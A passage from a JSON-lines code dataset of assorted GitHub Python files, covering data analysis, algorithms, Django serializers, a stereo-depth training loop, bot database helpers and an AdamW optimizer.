df_titanic.corr()\n\n# Visualización de la matriz de correlación\nplt.figure(figsize=(10, 8))\nsns.heatmap(correlation_matrix, annot=True, cmap='coolwarm')\nplt.title('Matriz de correlación')\nplt.show()\n\n# Análisis de la matriz de correlación\nprint(\"Matriz de correlación:\")\nprint(correlation_matrix)","repo_name":"castolo1/AI","sub_path":"TP 2/Ejercicio 5.py","file_name":"Ejercicio 5.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"37264426917","text":"import numpy as np\nimport glob\nfrom matplotlib import pyplot as 
plt\nfrom matplotlib.colors import LogNorm\nimport datetime as dt\nfrom scipy.optimize import minimize,leastsq\n\nf1 = glob.glob('D:/tmp/sun_photo/*04b.jpg')[0];\nf2 = glob.glob('D:/tmp/sun_photo/*04a.jpg')[0];\n\nframe1=plt.imread(f1)[10:-10,10:-10,:].astype('float32'); \nframe2=plt.imread(f2)[10:-10,10:-10,:].astype('float32'); \n#fig,ax=plt.subplots(2,1,sharex=True, sharey=True); ax[0].imshow(frame1[:,200:-200,0]); \n#ax[1].imshow(frame2[:,200:-200,0]); \n\nflag=np.all((frame1[:,:,0]>5,frame1[:,:,0]<245,frame2[:,:,0]>5,frame2[:,:,0]<245),axis=0);\nplt.figure(); cnt,x,y,fig=plt.hist2d(frame2[flag,0].ravel(),frame1[flag,0].ravel(),bins=255,norm=LogNorm());\n#cnt,x,y=np.histogram2d(frame2[flag,0].ravel(),frame1[flag,0].ravel(),bins=255);\n \nfoo=y[np.argmax(cnt,1)]; \nzind=np.nonzero(np.diff(foo)<=-9); zind=zind[0]; zind+=1; foo[zind]=0.5*(foo[zind+1]+foo[zind-1]);\nif sum(foo>238)>=1:\n cut=np.min(np.nonzero(foo>238)); \nelse:\n cut=foo.shape[0];\nplt.plot(x[:cut],foo[:cut]); plt.title('Scatter plot of image RED intensity for 1/60 and 1/30 exposures');\nM=x[:cut]/255; MP=foo[:cut]/255; \n\n#def cost(x):\n# return np.sum((1+x[0]*M+x[1]*M**2+x[2]*M**3- \\\n# a*(1+x[0]*MP+x[1]*MP**2+x[2]*MP**3))**2);\n#res = minimize(cost, [0.1,0.01,0.001], method='nelder-mead', \\\n# options={'xtol': 1e-8, 'disp': True});\n#ss=res.x;\n\ndef resid(x,a=1,M=1,MP=1):\n p=np.poly1d(list(x[::-1])+[1-sum(x)]);\n return p(M)- a*p(MP); \n#for a in [1,1.5,1.7,2,2.2,2.5,3.0,4.0,5.0,8.0]: \nfor a in [0.5]: \n a=1.0/a;\n ss=leastsq(resid,[0.1]*6,args=(a,M,MP))[0];\n print(a,ss,np.linalg.norm(resid(ss,a,M,MP))); \n plt.figure(); plt.plot(M,np.poly1d(list(ss[::-1])+[1-sum(ss)])(M));\n plt.xlabel(\"RED intensity\"); plt.ylabel(\"Normalized Irradiance\"); plt.title('Camera Response Function');","repo_name":"BNL-NowCasting/SolarForecasting","sub_path":"code/calibration/sun_photo.py","file_name":"sun_photo.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"70148469706","text":"# coding=utf-8\n\nclass UnionFind(object):\n def __init__(self):\n self.leader = dict()\n self.followers = dict()\n self.clusters = 0\n\n def add(self, node):\n assert node not in self.leader\n assert node not in self.followers\n\n self.leader[node] = node\n self.followers.setdefault(node, set())\n self.clusters += 1\n\n def union(self, v0, v1):\n v0 = self.leader[v0]\n v1 = self.leader[v1]\n if v0 == v1:\n return\n\n f0 = len(self.followers[v0])\n f1 = len(self.followers[v1])\n\n src = v0 if min(f0,f1) == f0 else v1\n dst = v1 if src == v0 else v0\n\n for node in self.followers[src]:\n self.leader[node] = dst\n self.followers[dst].add(node)\n del self.followers[src]\n self.leader[src] = dst\n self.clusters -= 1\n return dst\n\n def find(self, node):\n return self.leader[node]\n","repo_name":"bjorns/algo","sub_path":"lib/unionfind.py","file_name":"unionfind.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6882611883","text":"def convert_to_bytes(num, bol, str):\n num = int(num)\n if bol == \"True\":\n bol = True\n else:\n bol = False\n\n # print(type(bol), bol)\n\n b_num = bytes(num)\n print(f'-- The int value is \"{num}\"\\nbytes: \"{b_num}\"')\n b_bol = bytes(bol)\n print(f'-- The bool value is \"{bol}\"\\nbytes: \"{b_bol}\"')\n b_str = str.encode()\n print(f'-- The string value is \"{str}\"\\nbytes: \"{b_str}\"')\n\n\n# if __name__ == 
'__main__':\n# convert_to_bytes('10', 'False', 'aaa')\n# print('******')\n# convert_to_bytes('5', 'True', 'Are you suggesting that coconuts migrate?')","repo_name":"ykyselv/python_marathon","sub_path":"sprint01/t09/bytes.py","file_name":"bytes.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35389569546","text":"import logging\nimport sys\nfrom logging.handlers import TimedRotatingFileHandler\nimport os\nimport setting\n\nFORMATTER = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s — %(funcName)s:%(lineno)d - %(message)s')\nLOG_FILE = os.path.join(setting.data_dir_interim, setting.log_filename)\nLOGGER_NAME = \"nyc_data\"\n\n\ndef get_console_handler():\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(FORMATTER)\n return console_handler\n\n\ndef get_file_handler():\n file_handler = TimedRotatingFileHandler(LOG_FILE, when='midnight')\n file_handler.setFormatter(FORMATTER)\n return file_handler\n\n\ndef get_logger(logger_name):\n logger = logging.getLogger(logger_name)\n\n # better to have too much log than not enough\n logger.setLevel(logging.INFO)\n\n logger.addHandler(get_console_handler())\n logger.addHandler(get_file_handler())\n\n return logger\n","repo_name":"mailshanx/nyc_data","sub_path":"src/utils/log_config.py","file_name":"log_config.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20269292058","text":"from .base import Board as BaseBoard\nfrom machine import Pin\n\nclass Board(BaseBoard):\n\n def init(self):\n self.init_ssd1306i2c(\n reset_pin=self.init_pin(16, \"Display Reset\", Pin.OUT),\n scl_pin=self.init_pin(15, \"Display SCL\"),\n sda_pin=self.init_pin(4, \"Display SDA\"),\n )\n\n out_mapping = {\n \"1-1\": 25,\n \"1-3\": 12,\n \"1-5\": 13,\n \"2-1\": 17,\n \"2-3\": 2,\n \"2-5\": 23,\n \"2-7\": 22,\n \"4-1\": 0\n }\n for name, num in out_mapping.items():\n self.init_pin(num, name, Pin.OUT)\n\n in_mapping = {\n \"5-1\": 34,\n \"5-3\": 35,\n \"5-5\": 32,\n \"5-7\": 33,\n }\n for name, num in in_mapping.items():\n self.init_pin(num, name, Pin.IN)\n","repo_name":"ewaldshof/ewhome","sub_path":"firmware/board/bohei.py","file_name":"bohei.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9153577134","text":"from django.utils import timezone\nfrom rest_framework import serializers\n\nfrom polls.models import Poll, Question, Answer, UserAnswer, UserPoll\nfrom utils.constants import POLL_MINIMUM_DURATION_MINUTES, POLL_MINIMUM_DURATION_ERROR, START_DATE_CANNOT_BE_CHANGED, \\\n START_DATE_EARLIER_THAN_NOW, WRONG_QUESTION_ID, ANSWER_NOT_ALLOWED, \\\n CANNOT_CREATE_MULTIPLE_ANSWERS, CANNOT_ANSWER_FOR_ANOTHER_USER, QUESTION_CANNOT_BE_CHANGED, \\\n USER_POLL_CANNOT_BE_CHANGED, CANNOT_CREATE_ANSWER\nfrom utils.serializers import ChoicesField\n\n\nclass PollSerializer(serializers.ModelSerializer):\n def validate_start_date(self, value):\n if value < timezone.now():\n raise serializers.ValidationError(START_DATE_EARLIER_THAN_NOW)\n\n if self.instance and value != self.instance.start_date:\n raise serializers.ValidationError(START_DATE_CANNOT_BE_CHANGED)\n\n return value\n\n def validate(self, data):\n start_date = data.get('start_date')\n end_date = data.get('end_date')\n\n if start_date is not None and end_date is not None:\n if 
end_date - start_date < timezone.timedelta(minutes=POLL_MINIMUM_DURATION_MINUTES):\n raise serializers.ValidationError(POLL_MINIMUM_DURATION_ERROR)\n return data\n\n class Meta:\n model = Poll\n exclude = ('users',)\n extra_kwargs = {'questions': {'required': False}}\n depth = 2\n\n\nclass ActivePollSerializer(serializers.ModelSerializer):\n class Meta:\n model = Poll\n exclude = ('users',)\n read_only_fields = ('id', 'name', 'description', 'start_date', 'end_date', 'questions')\n\n\nclass QuestionSerializer(serializers.ModelSerializer):\n type = ChoicesField(choices=Question.TYPE_CHOICES)\n\n def validate(self, data):\n answers = data.get('answers')\n question_type = data.get('type')\n\n if answers and question_type == Question.TYPE_TEXT and len(answers) > 0:\n raise serializers.ValidationError(CANNOT_CREATE_ANSWER)\n return data\n\n class Meta:\n model = Question\n fields = '__all__'\n extra_kwargs = {'answers': {'required': False}}\n depth = 1\n\n\nclass AnswerSerializer(serializers.ModelSerializer):\n class Meta:\n model = Answer\n fields = '__all__'\n\n\nclass UserPollSerializer(serializers.ModelSerializer):\n class Meta:\n model = UserPoll\n fields = '__all__'\n\n\nclass UserAnswerSerializer(serializers.ModelSerializer):\n def validate_question(self, value):\n if self.instance and value != self.instance.question:\n raise serializers.ValidationError(QUESTION_CANNOT_BE_CHANGED)\n return value\n\n def validate_user_poll(self, value):\n if self.instance and value != self.instance.user_poll:\n raise serializers.ValidationError(USER_POLL_CANNOT_BE_CHANGED)\n return value\n\n def validate(self, data):\n question = data.get('question')\n user_poll = data.get('user_poll')\n answer = data.get('answer')\n request = self.context.get(\"request\")\n\n if question and user_poll:\n if question not in user_poll.poll.questions.all():\n raise serializers.ValidationError(WRONG_QUESTION_ID)\n\n if question and answer:\n if question.type != Question.TYPE_TEXT and \\\n answer not in question.answers.all().values_list('text', flat=True):\n raise serializers.ValidationError(ANSWER_NOT_ALLOWED)\n\n if request.method == 'POST' and question and user_poll and question.type != Question.TYPE_MULTIPLE:\n if UserAnswer.objects.filter(question=question, user_poll=user_poll).exists():\n raise serializers.ValidationError(CANNOT_CREATE_MULTIPLE_ANSWERS)\n\n if user_poll:\n if request.user != user_poll.user and request.session.session_key != user_poll.session_key:\n raise serializers.ValidationError(CANNOT_ANSWER_FOR_ANOTHER_USER)\n return data\n\n class Meta:\n model = UserAnswer\n fields = '__all__'\n\n\nclass UserPollEntrySerializer(serializers.ModelSerializer):\n poll = PollSerializer()\n answers = serializers.SerializerMethodField('get_answers')\n\n def get_answers(self, obj):\n answers = UserAnswer.objects.filter(user_poll=self.instance)\n return UserAnswerSerializer(answers, many=True).data\n\n class Meta:\n model = UserPoll\n exclude = ('user', 'session_key')\n","repo_name":"Kononkov1998/Polls","sub_path":"polls/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73276992905","text":"# 18258번 큐 2\r\nfrom collections import deque\r\nimport sys\r\n\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\nqueue = deque([])\r\nfor _ in range(n):\r\n order = input().rstrip().split()\r\n haveToDo = order[0]\r\n\r\n if haveToDo == \"push\":\r\n queue.append(order[1])\r\n elif 
haveToDo == \"pop\":\r\n if queue:\r\n print(queue.popleft())\r\n else:\r\n print(-1)\r\n elif haveToDo == \"size\":\r\n print(len(queue))\r\n\r\n elif haveToDo == \"empty\":\r\n if queue:\r\n print(0)\r\n else:\r\n print(1)\r\n elif haveToDo == \"front\":\r\n if queue:\r\n print(queue[0])\r\n else:\r\n print(-1)\r\n elif haveToDo == \"back\":\r\n if queue:\r\n print(queue[-1])\r\n else:\r\n print(-1)\r\n","repo_name":"glaxyt/bojSolv","sub_path":"18258.py","file_name":"18258.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16558929329","text":"import torch\nimport os\nimport time\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom datasets.messytable import MessytableDataset\nfrom Models import get_model\nfrom Losses import get_losses\nfrom Metrics.metrics import epe_metric\nfrom Metrics.metrics import tripe_metric\nfrom tensorboardX import SummaryWriter\nfrom utils.util import *\nimport pdb\n\nclass TrainSolver(object):\n\n def __init__(self, args, config):\n\n self.config = config\n self.args = args\n\n\n self.max_disp = self.config.ARGS.MAX_DISP\n self.loss_name = \"XTLoss\"\n\n train_dataset = MessytableDataset(config.SPLIT.TRAIN, gaussian_blur=False, color_jitter=False, debug=args.debug, sub=600)\n val_dataset = MessytableDataset(config.SPLIT.VAL, gaussian_blur=False, color_jitter=False, debug=args.debug, sub=100, isVal=True)\n\n self.TrainImgLoader = torch.utils.data.DataLoader(train_dataset, batch_size=config.SOLVER.BATCH_SIZE,\n shuffle=True, num_workers=config.SOLVER.NUM_WORKER, drop_last=True)\n\n self.ValImgLoader = torch.utils.data.DataLoader(val_dataset, batch_size=config.SOLVER.BATCH_SIZE,\n shuffle=False, num_workers=config.SOLVER.NUM_WORKER, drop_last=False)\n\n\n self.model = get_model(self.config)\n\n self.crit = get_losses(self.loss_name, max_disp=self.max_disp)\n\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.config.SOLVER.LR_CASCADE)\n\n self.scheduler = optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=[2,3,4], gamma=0.5)\n\n self.writer = SummaryWriter(args.logdir)\n\n self.global_step = 0\n self.epoch = 0\n self.best_epe = 9999999999\n\n def save_checkpoint(self, best=False):\n\n ckpt_root = os.path.join(self.args.logdir, 'checkpoints')\n\n if not os.path.exists(ckpt_root):\n os.makedirs(ckpt_root) \n \n ckpt_name = 'ep_{:d}.pth'.format(self.epoch)\n\n if best:\n ckpt_name = 'best_epe_{:f}.pth'.format(self.best_epe)\n\n states = {\n 'epoch': self.epoch,\n 'best_epe': self.best_epe,\n 'global_step': self.global_step,\n 'model_state': self.model.state_dict(),\n 'optimizer_state': self.optimizer.state_dict(),\n 'scheduler_state': self.scheduler.state_dict()\n }\n ckpt_full = os.path.join(ckpt_root, ckpt_name)\n \n torch.save(states, ckpt_full)\n \n def load_checkpoint(self):\n\n ckpt_root = os.path.join(self.args.loadmodel)\n\n states = torch.load(ckpt_full, map_location=lambda storage, loc: storage)\n\n self.epoch = states['epoch']\n self.best_epe = states['best_epe']\n self.global_step = states['global_step']\n self.model.load_state_dict(states['model_state'])\n self.optimizer.load_state_dict(states['optimizer_state'])\n self.scheduler.load_state_dict(states['scheduler_state'])\n\n def run(self):\n self.model = nn.DataParallel(self.model)\n self.model.cuda()\n \n print('Number of model parameters: {}'.format(sum([p.data.nelement() for p in self.model.parameters()])))\n\n if self.args.loadmodel:\n 
self.load_checkpoint()\n print('[{:d}] Model loaded.'.format(self.args.loadmodel))\n \n for epoch in range(self.config.SOLVER.EPOCHS):\n self.model.train()\n self.epoch = epoch\n for i, data_batch in enumerate(self.TrainImgLoader):\n start_time = time.time()\n \n self.model.train()\n imgL, imgR, disp_L = data_batch['img_sim_L'], data_batch['img_sim_R'], data_batch['img_disp_l']\n imgL, imgR, disp_L = imgL.cuda(), imgR.cuda(), disp_L.cuda()\n\n disp_L = F.interpolate(disp_L, scale_factor=0.5, mode='nearest',\n recompute_scale_factor=False) # [bs, 1, H, W]\n \n self.optimizer.zero_grad()\n #pdb.set_trace()\n disp_pred_left = self.model(imgL, imgR)\n \n #pdb.set_trace()\n\n loss = self.crit(imgL, imgR, disp_pred_left)\n loss.backward()\n self.optimizer.step()\n \n elapsed = time.time() - start_time\n #print(disp_L.shape, disp_pred_left.shape)\n train_EPE_left = epe_metric(disp_L, disp_pred_left, self.max_disp)\n train_3PE_left = tripe_metric(disp_L, disp_pred_left, self.max_disp)\n\n \n print(\n 'Epoch[{:d}/{:d}] iter[{:d}/{:d}] Train Loss = {:.6f}, EPE = {:.3f} px, 3PE = {:.3f}%, time = {:.3f}s.'.format(\n self.epoch, self.config.SOLVER.EPOCHS,\n i, len(self.TrainImgLoader),\n loss.item(),\n train_EPE_left, \n train_3PE_left * 100,\n elapsed\n )\n )\n #print(imgL.shape, disp_pred_left.shape, disp_L.shape)\n if self.global_step % self.args.summary_freq == 0:\n scalar_output = {'reproj_loss': loss.item(), 'EPE': train_EPE_left, 'bad3': train_3PE_left}\n save_scalars(self.writer, 'train', scalar_output, self.global_step)\n\n save_images(self.writer, 'train', {'img_L':[imgL.detach().cpu()]}, self.global_step) \n save_images(self.writer, 'train', {'img_R':[imgR.detach().cpu()]}, self.global_step)\n save_images(self.writer, 'train', {'disp_gt':[disp_L.detach().cpu()]}, self.global_step) \n save_images(self.writer, 'train', {'disp_pred':[disp_pred_left.detach().cpu()]}, self.global_step)\n\n self.global_step += 1\n\n self.scheduler.step()\n\n start_time = time.time()\n self.model.eval()\n with torch.no_grad():\n \n val_EPE_metric_left = 0.0\n val_TriPE_metric_left = 0.0\n N_total = 0.0\n \n for i, val_batch in enumerate(self.ValImgLoader):\n imgL, imgR, disp_L = val_batch['img_sim_L'], val_batch['img_sim_R'], val_batch['img_disp_l']\n imgL, imgR, disp_L = imgL.cuda(), imgR.cuda(), disp_L.cuda()\n \n disp_L = F.interpolate(disp_L, scale_factor=0.5, mode='nearest',\n recompute_scale_factor=False) # [bs, 1, H, W]\n\n N_curr = imgL.shape[0]\n \n #print(imgL.shape, imgR.shape)\n disp_pred_left = self.model(imgL, imgR)\n \n val_EPE_metric_left += epe_metric(disp_L, disp_pred_left, self.max_disp) * N_curr \n val_TriPE_metric_left += tripe_metric(disp_L, disp_pred_left, self.max_disp) * N_curr\n\n N_total += N_curr\n\n scalar_output = {'reproj_loss': loss.item(), 'EPE': train_EPE_left, 'bad3': train_3PE_left}\n save_scalars(self.writer, 'validation', scalar_output, self.global_step)\n\n save_images(self.writer, 'validation', {'img_L':[imgL.detach().cpu()]}, self.global_step) \n save_images(self.writer, 'validation', {'img_R':[imgR.detach().cpu()]}, self.global_step)\n save_images(self.writer, 'validation', {'disp_gt':[disp_L.detach().cpu()]}, self.global_step) \n save_images(self.writer, 'validation', {'disp_pred':[disp_pred_left.detach().cpu()]}, self.global_step)\n \n val_EPE_metric_left /= N_total\n val_TriPE_metric_left /= N_total\n \n\n elapsed = time.time() - start_time\n print(\n 'Epoch:[{:d}/{:d}] Validation : EPE = {:.6f} px, 3PE = {:.3f} %, time = {:.3f} s.'.format(\n self.epoch, 
self.config.SOLVER.EPOCHS,\n val_EPE_metric_left, \n val_TriPE_metric_left * 100, \n elapsed / N_total\n )\n )\n\n self.save_checkpoint()\n print('')\n print('Epoch[{:d}] Model saved.'.format(self.epoch))\n\n if val_EPE_metric_left < self.best_epe:\n self.best_epe = val_EPE_metric_left\n self.save_checkpoint(best=True)\n print('')\n print('Best Epoch[{:d}] Model saved.'.format(self.epoch))\n \n\n\n\n","repo_name":"VictorTao1998/ActiveStereo","sub_path":"Sovlers/solver_train.py","file_name":"solver_train.py","file_ext":"py","file_size_in_byte":8774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14022097846","text":"import sqlite3 as sq\nfrom create_bot import bot\n\n\ndef sql_start():\n global base, cur\n base = sq.connect('keys_base.db')\n cur = base.cursor()\n if base:\n print('Data base connected OK')\n base.execute('CREATE TABLE IF NOT EXISTS search_keys (id TEXT PRIMARY KEY, keys TEXT)')\n base.commit()\n\n\nasync def sql_add_command(user_id, key, message):\n if cur.execute('SELECT keys FROM search_keys WHERE id == ?', (str(user_id),)).fetchone() is None:\n cur.execute('INSERT INTO search_keys VALUES (?, ?)', (user_id, key))\n base.commit()\n else:\n await bot.send_message(message.from_user.id, 'Ключи уже занесены')\n\n\nasync def my_keys(user_id, message):\n try:\n text = ''.join(cur.execute('SELECT keys FROM search_keys WHERE id == ?', (str(user_id),)).fetchone())\n await bot.send_message(message.from_user.id, text)\n except:\n await bot.send_message(message.from_user.id, 'Сначала внеси ключи')\n\n\nasync def change_keys(id, keys):\n cur.execute('UPDATE search_keys SET keys == ? WHERE id == ?', (str(keys), id))\n base.commit()\n","repo_name":"EgorYakunin/hrc_parser","sub_path":"data_base/sqlite_db.py","file_name":"sqlite_db.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73056953864","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n\nsetuptools.setup(\n # Project\n name=\"dragn\",\n version=\"0.4.0\",\n description=\"A library to emulate rolling dice\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/lurst/dragn\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3 :: Only\",\n ],\n # Author\n author=\"Gil Goncalves\",\n author_email=\"lursty@gmail.com\",\n # Code\n packages=setuptools.find_packages(),\n)\n","repo_name":"LuRsT/dragn","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"81"} +{"seq_id":"7923832959","text":"from tastypie_mongoengine import resources\nfrom tastypie.authorization import Authorization\nfrom tastypie.cache import SimpleCache\n\nfrom models import SignUp\n\nclass SignUpResource(resources.MongoEngineResource):\n class Meta:\n app_label = \"test\"\n queryset = SignUp.objects.all()\n allowed_methods = ('get','post')\n authorization = Authorization()\n filtering = {\n 'location': resources.QUERY_TERMS_ALL\n }\n cache = SimpleCache()\n \n def dehydrate_email(self, bundle):\n return None\n \n def 
dehydrate_name(self, bundle):\n return None\n \n def build_filters(self, filters=None):\n if filters is None:\n filters = {}\n \n orm_filters = super(SignUpResource, self).build_filters(filters)\n \n if \"within_distance\" in filters:\n points = filters['within_distance'].split(',')\n points = map(float, points)\n distance = [\n (points[0],points[1]),\n 5\n ]\n \n orm_filters[\"location__within_distance\"] = distance\n \n return orm_filters\n ","repo_name":"eddowding/signmeup","sub_path":"server/signups/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21939714724","text":"from pathlib import Path\nimport pandas\nimport json\n\n\ndef excel_json():\n try:\n path = Path(__file__).parent.parent/\"Excel/test.xlsx\"\n\n #reading suite sheet\n suite = pandas.read_excel(path, sheet_name='Suite')\n module = suite.to_json(orient='records')\n\n #reading testcases sheet\n testcase = pandas.read_excel(path, sheet_name='TestsCases')\n tests = testcase.to_json(orient='records')\n\n test_json = json.loads(tests)\n module_json = json.loads(module)\n\n test_json\n size = len(test_json)\n global testName\n for i in range(0,size):\n name = test_json[i]['ModuleName']\n if(name is not None):\n testName = name\n else:\n test_json[i]['ModuleName'] = testName\n\n response = {\"modules\": module_json, \"tests\": test_json}\n except:\n response = {}\n return response\n\ndef runnable_test():\n try:\n json = excel_json()\n global runnableModules\n runnableModules= []\n runnableTests = {}\n if(len(json) > 0):\n vars = {}\n modules = json['modules']\n tests = json[\"tests\"]\n for i in range(0,len(modules)):\n module_name = modules[i]['ModuleName']\n flag = modules[i]['toBeRun']\n if flag == 'Y':\n runnableModules.append(module_name)\n\n for j in range(0, len(runnableModules)):\n runModule = runnableModules[j]\n for k in range(0,len(tests)):\n runTestModule = tests[k]['ModuleName']\n runTestCase = tests[k]['TestCaseName']\n toBeRun = tests[k]['toBeRun']\n if runTestModule == runModule and toBeRun == 'Y':\n runnableTests[runTestCase] = tests[k]\n return runnableTests\n except:\n return runnableTests\n\n\n\n","repo_name":"santhosh-alluri/pythonTestProject","sub_path":"Lib/ExcelUtility.py","file_name":"ExcelUtility.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69963980745","text":"\"\"\"\nCommon functions for styling notebooks \npublished as reports.\n\"\"\"\nimport pandas as pd\nimport pandas.io.formats.style # to add type hint (https://github.com/pandas-dev/pandas/issues/24884)\n\nfrom IPython.display import HTML\n\n'''\nWorking example:\nhttps://github.com/CityOfLosAngeles/planning-entitlements/blob/master/notebooks/D1-entitlement-demographics.ipynb\n\n# Currency: https://stackoverflow.com/questions/35019156/pandas-format-column-as-currency\n'''\n \n# Display a table of route-level stats for each route_group\n# Displaying route_name makes chart too crowded \ndef style_route_stats(df):\n df = df.assign(\n route_short_name = df.apply(\n lambda x: x.route_long_name if x.route_short_name is None\n else x.route_short_name, axis=1)\n )\n \n # Rename columns for display\n rename_cols = {\n \"route_id2\": \"Route ID\",\n \"route_short_name\": \"Route Name\",\n \"route_group\": \"Route Group\",\n \"num_trips\": \"# trips\",\n \"daily_avg_freq\": \"Daily Avg Freq (trips per hr)\",\n 
\"pm_peak_freq\": \"PM Peak Avg Freq (trips per hr)\",\n \"percentiles\": \"25th, 50th, 75th ptile (hrs)\",\n \"mean_speed_mph\": \"Avg Daily Speed (mph)\",\n }\n \n # Style it\n drop_cols = [\n \"calitp_itp_id\", \"route_id\", \"route_group\", \n \"pct_trips_competitive\",\n \"p25\", \"p50\", \"p75\",\n \"category\"\n ]\n \n # Change alignment for some columns\n # https://stackoverflow.com/questions/59453091/left-align-the-first-column-and-center-align-the-other-columns-in-a-pandas-table\n df_style = (df.sort_values(\n [\"pct_trips_competitive\", \"route_id2\"], \n ascending=[False , True])\n .drop(columns = drop_cols)\n .rename(columns = rename_cols)\n .style.format(\n subset=['Daily Avg Freq (trips per hr)', \n 'PM Peak Avg Freq (trips per hr)', \n 'Avg Daily Speed (mph)', \n ], \n **{'formatter': '{:,.3}'})\n .set_properties(subset=['Route ID', 'Route Name'], \n **{'text-align': 'left'})\n .set_properties(subset=['# trips', 'Daily Avg Freq (trips per hr)', \n 'PM Peak Avg Freq (trips per hr)', \n 'Avg Daily Speed (mph)',\n ], \n **{'text-align': 'center'})\n .set_table_styles([dict(selector='th', \n props=[('text-align', 'center')])\n ])\n .hide(axis=\"index\")\n .to_html()\n )\n \n display(HTML(\"
Route Stats
\"))\n display(HTML(df_style))","repo_name":"cal-itp/data-analyses","sub_path":"bus_service_increase/bus_service_utils/report_utils.py","file_name":"report_utils.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"81"} +{"seq_id":"30537484734","text":"from typing import (\n List,\n)\nfrom lintcode import (\n Interval,\n)\n\n\"\"\"\nDefinition of Interval:\nclass Interval(object):\n def __init__(self, start, end):\n self.start = start\n self.end = end\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param intervals: an array of meeting time intervals\n @return: the minimum number of conference rooms required\n \"\"\"\n def min_meeting_rooms(self, intervals: List[Interval]) -> int:\n # Write your code here\n\n start = sorted([t.start for t in intervals])\n end = sorted([t.end for t in intervals])\n\n res, count = 0, 0\n e, s = 0, 0\n\n while s < len(intervals):\n if start[s] < end[e]:\n s += 1\n count += 1\n else:\n count -= 1\n e += 1\n res = max(res, count)\n return res\n","repo_name":"AjayKrP/GoogleInterview","sub_path":"DS_Practice/meeting_room_ii.py","file_name":"meeting_room_ii.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9941281761","text":"# Learner: 王振强\n# Learn Time: 2022/2/15 17:42\nimport torch.nn as nn\nimport math\nimport torch\nfrom torch.optim.optimizer import Optimizer\n\n\nclass AdamW(Optimizer):\n\n def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0, warmup=0):\n if not 0.0 <= lr:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n if not 0.0 <= eps:\n raise ValueError(\"Invalid epsilon value: {}\".format(eps))\n if not 0.0 <= betas[0] < 1.0:\n raise ValueError(\"Invalid beta parameter at index 0: {}\".format(betas[0]))\n if not 0.0 <= betas[1] < 1.0:\n raise ValueError(\"Invalid beta parameter at index 1: {}\".format(betas[1]))\n\n defaults = dict(lr=lr, betas=betas, eps=eps,\n weight_decay=weight_decay, warmup=warmup)\n super(AdamW, self).__init__(params, defaults)\n\n def __setstate__(self, state):\n super(AdamW, self).__setstate__(state)\n\n def step(self, closure=None):\n loss = None\n if closure is not None:\n loss = closure()\n\n for group in self.param_groups:\n\n for p in group['params']:\n if p.grad is None:\n continue\n grad = p.grad.data.float()\n if grad.is_sparse:\n raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')\n\n p_data_fp32 = p.data.float()\n\n state = self.state[p]\n\n if len(state) == 0:\n state['step'] = 0\n state['exp_avg'] = torch.zeros_like(p_data_fp32)\n state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)\n else:\n state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)\n state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)\n\n exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']\n beta1, beta2 = group['betas']\n\n state['step'] += 1\n\n exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)\n exp_avg.mul_(beta1).add_(1 - beta1, grad)\n\n denom = exp_avg_sq.sqrt().add_(group['eps'])\n bias_correction1 = 1 - beta1 ** state['step']\n bias_correction2 = 1 - beta2 ** state['step']\n\n if 